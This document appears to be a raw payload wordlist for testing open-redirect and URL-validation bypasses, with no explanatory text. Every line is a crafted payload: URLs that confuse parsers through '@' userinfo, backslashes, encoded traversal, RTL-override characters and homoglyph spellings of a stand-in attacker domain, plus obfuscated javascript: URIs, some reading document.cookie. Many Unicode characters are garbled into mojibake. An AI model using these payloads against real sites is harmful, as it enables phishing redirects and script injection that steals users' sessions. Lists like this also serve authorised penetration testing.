https://%5cwww.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%5câ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https:///example.com@google.com/%2e%2e
https:///example.com@google.com/%2f%2e%2e
https:///google.com/%2e%2e
https:///google.com/%2f%2e%2e
https:///localdomain.pw/%2e%2e
https:///localdomain.pw/%2f%2e%2e
https:///www.google.com/%2e%2e
https:///www.google.com/%2f%2e%2e
https:///www.google.com@www.google.com/%2e%2e
https:///www.google.com@www.google.com/%2f%2e%2e
https:///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///www.proviesec.medium.com@localdomain.pw/%2e%2e
https:///www.proviesec.medium.com@localdomain.pw/%2f%2e%2e
https:///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://:@google.com\@example.com
https://:@google.com\@www.google.com
https://:@localdomain.pw\@www.proviesec.medium.com
https://:@www.google.com\@www.google.com
https://:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.google.com
https://:@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.proviesec.medium.com
https://example.com/https://google.com/
https://example.com@google.com
https://example.com@google.com/
https://example.com@google.com/%2e%2e%2f
https://example.com@google.com/%2f%2e%2e
https://example.com@google.com/%2f..
https://example.com@google.com//
https://google.com
https://google.com/
https://google.com/%2e%2e%2f
https://google.com/%2f%2e%2e
https://google.com/%2f..
https://google.com//
https://localdomain.pw
https://localdomain.pw/
https://localdomain.pw/%2e%2e%2f
https://localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f..
https://localdomain.pw//
https://localdomain.pw/www.proviesec.medium.com
https://localdomain.pw\udfff@www.proviesec.medium.com/
https://localdomain.pwï¿½@www.proviesec.medium.com/
https://localdomainï½¡pw\áµ—www.google.com
https://localdomainï½¡pw\áµ—www.proviesec.medium.com
https://www.google.com
https://www.google.com%09.www.google.com
https://www.google.com%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com%252ewww.google.com
https://www.google.com%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com%40%E2%80%AE@wp.niamodlacol
https://www.google.com%40%E2%80%AE@www.google.com
https://www.google.com%40%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com/
https://www.google.com/%2e%2e%2f
https://www.google.com/%2f%2e%2e
https://www.google.com/%2f..
https://www.google.com//
https://www.google.com/https://www.google.com/
https://www.google.com/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://www.google.com/www.google.com
https://www.google.com;@www.google.com
https://www.google.com;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com@%E2%80%AE@wp.niamodlacol
https://www.google.com@%E2%80%AE@www.google.com
https://www.google.com@%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com@'#www.google.com
https://www.google.com@'#â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com@/%E2%80%AE@wp.niamodlacol
https://www.google.com@/%E2%80%AE@www.google.com
https://www.google.com@/%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com@google.com
https://www.google.com@google.com/
https://www.google.com@google.com/%2f..
https://www.google.com@google.com//
https://www.google.com@www.google.com
https://www.google.com@www.google.com/
https://www.google.com@www.google.com/%2e%2e%2f
https://www.google.com@www.google.com/%2f%2e%2e
https://www.google.com@www.google.com/%2f..
https://www.google.com@www.google.com//
https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://www.google.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://www.google.com\udfff@www.google.com/
https://www.google.comï¹”@www.google.com
https://www.google.comï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.google.comï½¡â‚¨/
https://www.google.comï¿½@www.google.com/
https://www.proviesec.medium.com%09.localdomain.pw
https://www.proviesec.medium.com%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com%252elocaldomain.pw
https://www.proviesec.medium.com%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com%40%E2%80%AE@localdomain.pw
https://www.proviesec.medium.com%40%E2%80%AE@wp.niamodlacol
https://www.proviesec.medium.com%40%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com/https://localdomain.pw/
https://www.proviesec.medium.com/https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://www.proviesec.medium.com;@localdomain.pw
https://www.proviesec.medium.com;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com@%E2%80%AE@localdomain.pw
https://www.proviesec.medium.com@%E2%80%AE@wp.niamodlacol
https://www.proviesec.medium.com@%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com@'#localdomain.pw
https://www.proviesec.medium.com@'#â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com@/%E2%80%AE@localdomain.pw
https://www.proviesec.medium.com@/%E2%80%AE@wp.niamodlacol
https://www.proviesec.medium.com@/%E2%80%AE@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com@localdomain.pw
https://www.proviesec.medium.com@localdomain.pw/
https://www.proviesec.medium.com@localdomain.pw/%2e%2e%2f
https://www.proviesec.medium.com@localdomain.pw/%2f%2e%2e
https://www.proviesec.medium.com@localdomain.pw/%2f..
https://www.proviesec.medium.com@localdomain.pw//
https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://www.proviesec.medium.com@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://www.proviesec.medium.comï¹”@localdomain.pw
https://www.proviesec.medium.comï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://www.proviesec.medium.comï½¡â‚¨/
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.google.com
https://â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.proviesec.medium.com
https:google.com
https:localdomain.pw
https:www.google.com
https:â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ja&#x0000A;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&Tab;vascript:alert(1)
jaVAscript://www.google.com//%0d%0aalert(1);//
jaVAscript://www.proviesec.medium.com//%0d%0aalert(1);//
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
java&#x73;cript:alert()
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascripT://www.google.com/%250d%250aalert(document.cookie)
javascripT://www.proviesec.medium.com/%250d%250aalert(document.cookie)
javascript&#58;alert(1)
javascript&#x0003A;alert()
javascript&#x3A;alert()
javascript&colon;alert()
javascript:%0aalert`1`
javascript:%250Aalert(1)
javascript:%61%6c%65%72%74%28%29
javascript://%0aalert(1)
javascript://%0aalert`1`
javascript://example.com?%a0alert%281%29
javascript://https://example.com/?z=%0Aalert(1)
javascript://https://www.google.com/?z=%0Aalert(1)
javascript://https://www.proviesec.medium.com/?z=%0Aalert(1)
javascript://www.google.com?%a0alert%281%29
javascript://www.proviesec.medium.com?%a0alert%281%29
javascript:\u0061\u006C\u0065\u0072\u0074``
javascript:a\u006Cert``"
javascript:al&#x65;rt``
javascript:alert%60%60
javascript:alert&lpar;&rpar;
javascript:alert(1)
javascript:alert(1)//https://www.google.com
javascript:alert(1)//https://www.proviesec.medium.com
javascript:alert(1)//localdomain.pw/
javascript:alert(1)//www.google.com/
javascript:alert(1)//www.proviesec.medium.com/
javascript:alert(1);
javascript:alert(document.domain)//://
javascript:new%20Function`al\ert\`1\``;
javascript:x='%27-alert(1)-%27';
localdomain.pw/www.proviesec.medium.com
www.google.com%09.www.google.com
www.google.com%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.google.com%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.google.com%252ewww.google.com
www.google.com%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.google.com/www.google.com
www.google.com;@www.google.com
www.google.com;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.google.comï¹”@www.google.com
www.google.comï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.proviesec.medium.com%09.localdomain.pw
www.proviesec.medium.com%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.proviesec.medium.com%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.proviesec.medium.com%252elocaldomain.pw
www.proviesec.medium.com%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.proviesec.medium.com;@localdomain.pw
www.proviesec.medium.com;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.proviesec.medium.comï¹”@localdomain.pw
www.proviesec.medium.comï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
x00http://google.com
Â°/localdomain.pw
Â°/www.google.com
Â°/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.google.com
â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.proviesec.medium.com
ã€±google.com
ã€±localdomain.pw
ã€±www.google.com
ã€±â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã€µgoogle.com
ã€µlocaldomain.pw
ã€µwww.google.com
ã€µâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ã‚google.com
ã‚localdomain.pw
ã‚www.google.com
ã‚â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ãƒ¼google.com
ãƒ¼localdomain.pw
ãƒ¼www.google.com
ãƒ¼â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
ï½°google.com
ï½°localdomain.pw
ï½°www.google.com
ï½°â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
